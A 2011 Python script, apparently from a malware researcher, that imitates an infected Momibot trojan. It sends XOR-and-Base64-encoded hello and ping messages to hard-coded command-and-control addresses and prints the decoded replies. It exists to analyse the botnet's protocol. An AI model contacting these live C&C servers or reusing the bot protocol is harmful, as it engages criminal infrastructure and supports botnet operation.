dah4cker

MomiComm.py

Aug 10th, 2011
  1. #!/usr/bin/python
  2. # DaH4cKeR : 09-Aug-2011
  3. # Script : MomiComm.py
  4. # http://hypersecurity.blogspot.com
  5. #
  6. # Script to communicate with Win32/Momibot Trojan. It will send &
  7. # receive commands from the C&C server and display all responses (XML)
  8. # in clear text.
  9. #
  10. # http://www.microsoft.com/security/portal/Entry.aspx?name=Backdoor:Win32/Momibot.gen!B
  11. #
  12. # Cheers,
  13. # @DaH4cker
  14. #
  15. #######################################################################################
  16.  
# C&C endpoints ("host:port") taken from analysed samples; the MD5 next to
# each one identifies the sample it was recovered from. Uncomment the one to
# talk to -- the last active assignment wins.
#CnC = "212.124.123.98:80"      # Sample MD5: 108da66dfa28a790a08be1965a2df8c2
#CnC = "184.105.178.85:80"      # Sample MD5: 2a593a1ead30ee30017d71bd18d9e66b
CnC = "203.146.253.110:8090"    # Sample MD5: 598417359361205d9c2a1892e3a31c13

# According to the author, every sample analysed so far used this XOR key
# and one of these PHP control pages.
cntrl_page = "/v4/index.php"
#cntrl_page = "/v5/index.php"

# Single byte: encrypt()/decrypt() call ord() on it, so it must stay length 1.
XOR_key = "\x53"
  27.  
  28. ################### Modify beyond this at your own risk ! #####################
  29.  
  30.  
  31. import base64
  32. import httplib
  33.  
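def encrypt(msg, key):
    """Encode *msg* the way the bot's wire format expects.

    Every byte of *msg* is XORed with the single-byte *key* and the result is
    Base64-encoded. Despite the name this is reversible obfuscation, not
    encryption: anyone holding the one-byte key (or trying all 256 values)
    can recover the plaintext, which is what makes the traffic decodable for
    analysis.

    Args:
        msg: Request body as a byte string (text is taken as Latin-1, so each
            character must be below 256, matching the original chr()/ord()
            behaviour).
        key: Exactly one character/byte; ord() raises TypeError otherwise.

    Returns:
        The Base64 form of the XORed bytes, as returned by base64.b64encode.
    """
    mask = ord(key)
    if not isinstance(msg, bytes):
        # Text input: map code points 0-255 straight to bytes.
        msg = msg.encode("latin-1")
    # One pass over a bytearray instead of growing a string with += per char.
    masked = bytearray(octet ^ mask for octet in bytearray(msg))
    return base64.b64encode(bytes(masked))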
  41.  
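def decrypt(msg, key):
    """Decode a server reply: Base64-decode *msg*, then XOR with *key*.

    The input comes from the remote server and must be treated as untrusted;
    nothing here validates that the decoded bytes are well-formed XML or even
    printable.

    Args:
        msg: Base64 text as received in the HTTP response body.
        key: Exactly one character/byte used as the XOR mask.

    Returns:
        The decoded byte string, or the literal text
        "Invalid or Unknown Response" if decoding fails for any reason.
        NOTE(review): the failure marker is in-band, so a reply that decodes
        to that exact text cannot be told apart from a decode error.
    """
    try:
        mask = ord(key)
        raw = bytearray(base64.b64decode(msg))
        # Single pass over the decoded bytes; avoids per-character string +=.
        return bytes(bytearray(octet ^ mask for octet in raw))
    except Exception:
        # Deliberately broad, as in the original: any malformed reply is
        # reported to the caller as text rather than raised.
        return "Invalid or Unknown Response"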
  52.  
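def send_receive(params):
    """POST *params* to the configured control page and return the decoded reply.

    Uses the module-level CnC ("host:port"), cntrl_page and XOR_key settings.
    The peer is an untrusted server, so the call is bounded: the socket has a
    timeout, the body read is capped, and the connection is always closed.

    Args:
        params: Request body to send; the __main__ block passes the output of
            encrypt().

    Returns:
        On HTTP 200, the body run through decrypt(). On any other status, the
        string "<status> <reason>". On any exception, "Timed Out - <error>"
        (the prefix is used for every failure, not only timeouts).
    """
    timeout_s = 15        # without this the socket can block indefinitely
    max_body = 1 << 20    # 1 MiB cap on a body the remote side fully controls

    conn = None
    try:
        conn = httplib.HTTPConnection(CnC, timeout=timeout_s)
        conn.request("POST", cntrl_page, params, {"Content-Type": "text/xml"})
        resp = conn.getresponse()
        if resp.status == 200:
            # A body cut off at the cap will normally fail Base64 decoding
            # and come back as decrypt()'s failure text.
            return decrypt(resp.read(max_body), XOR_key)
        return str(resp.status) + " " + resp.reason
    except Exception as err:
        return "Timed Out - " + str(err)
    finally:
        # The original closed the connection only on the success path.
        if conn is not None:
            conn.close()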
  67.  
if __name__ == "__main__":
    # Emulate a bot check-in: send the registration ("binfo") message and
    # then a ping, both with the same hard-coded bot id, and show what the
    # server answers. The replies are server-controlled and printed as-is.
    exchanges = (
        ("Sending hello packet..",
         "<root><binfo id=\'3559939039\' nt=\'1\' bv=\'4.6\' lt=\'LAN\' os=\'Windows XP Professional\'> </binfo></root>"),
        ("Sending ping packet..",
         "<root><ping id=\'3559939039\'/></root>"),
    )

    for banner, xml_msg in exchanges:
        encoded = encrypt(xml_msg, XOR_key)
        print(banner)
        print("Response: " + send_receive(encoded))